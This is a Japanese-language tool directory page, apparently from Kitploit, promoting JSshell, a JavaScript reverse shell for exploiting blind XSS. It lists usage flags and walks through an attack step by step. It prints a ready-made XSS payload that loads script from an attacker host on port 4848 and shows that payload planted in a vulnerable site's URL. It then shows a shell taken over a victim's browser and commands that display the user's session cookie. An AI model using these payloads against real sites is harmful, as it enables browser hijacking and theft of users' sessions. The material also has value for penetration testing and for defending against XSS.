Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
JSshell — JSshell - JavaScript リバース/リモートシェル | Kitploit
ツール/GitHubGitHub/shelld3v/jsshell
ペイロード生成ウェブアプリケーション悪用ペネトレーションテストリモートアクセスツール
GitHubshelld3v/jsshell

JSshell

JSshell - JavaScript リバース/リモートシェル

リポジトリを見る
6311103年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

JSshell - バージョン 3.1

JSshell

JSshell - JavaScript リバースシェル。リモートでJSコードを実行したり、ブラインドXSSを悪用したりするために使用されます。

必要条件: 任意のOS + Python 2 または Python 3

JSshell バージョン 3.1 の新機能

JShell 3.1 の新バージョンでの更新:

  • 新しい JSshell コマンド: snippet -> JavaScript コードのスニペットを記述できます
root@kitploit:~
>>> snippet
Use CTRL+D to finish the snippet

function new() {
    new = 'New update: Support javascript snippet =)';
    confirm(new)
}

new()
>>> 
  • クワイエットモード (プロ向け)
  • <body> リバースシェルペイロードを追加
  • いくつかのバグを修正

使い方

JS リバースシェルペイロードを生成: -g

リスニングおよびペイロード生成用のローカルポート番号を設定 (デフォルト: 4848): -p

ペイロード生成用のローカルソースアドレスを設定 (デフォルト: IPアドレスを自動検出): -s

シェル接続のタイムアウトを設定 (ユーザーがセッションを終了するとシェルは永久に一時停止されます。タイムアウトを設定すると、タイムアウトを超えるとシェルが閉じられます): -w

シェル取得後にコマンドを実行: -c

使用例:

  • jsh.py
  • jsh.py -g
  • jsh.py -p 1234
  • jsh.py -s 48.586.1.23 -g
  • jsh.py -c "alert(document.cookie)" -w 10

JSshell の実行例:

これは JSshell の使い方をステップバイステップで説明した例です。

まず、リバース JS シェルペイロードを生成し、シェルタイムアウトを設定する必要があります (例: 20 秒):

root@kitploit:~
~# whoami
root
~# ls
README.md   jsh.py
~# python3 jsh.py -g -w 20
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...

次に、このペイロードをウェブサイトに貼り付けます:

https://vulnwebs1te.com/b/search?q=<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},1248)>

ページにアクセスすると、リバース JS シェルが得られます:

root@kitploit:~
    __
  |(_  _ |_  _  |  |
\_|__)_> | |(/_ |  |
                      v1.0

Payload:
<svg/onload=setInterval(function(){with(document)body.appendChild(createElement("script")).src="//171.224.181.106:4848"},999)>

Listening on [any] 4848 for incoming JS shell ...
Got JS shell from [75.433.24.128] port 39154 to DESKTOP-1GSL2O2 4848
$ established
$ the
$ shell
$
$
$ help
JSshell using javascript code as shell commands. Also supports some commands:
help                  This help
exit, quit            Exit the JS shell
$

いくつかのコマンドを実行してみましょう:

root@kitploit:~
$ var test = 'controlled'
$ confirm(test)
$

そしてアラートがポップアップ表示されます: controlled

root@kitploit:~
$ prompt(document.cookie)
$

そしてブラウザはユーザーのクッキーを表示します: JSESSION=3bda8...

root@kitploit:~
$ exit
~# whoami
root
~# pwd
/home/shelld3v
~#

これで終了です!

作者

これは shelld3v によって作成されました!

ツールをダウンロード